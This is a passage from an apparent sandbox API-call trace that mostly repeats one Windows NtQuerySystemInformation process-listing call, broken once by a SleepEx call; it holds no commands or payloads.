SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.783] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0235.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, 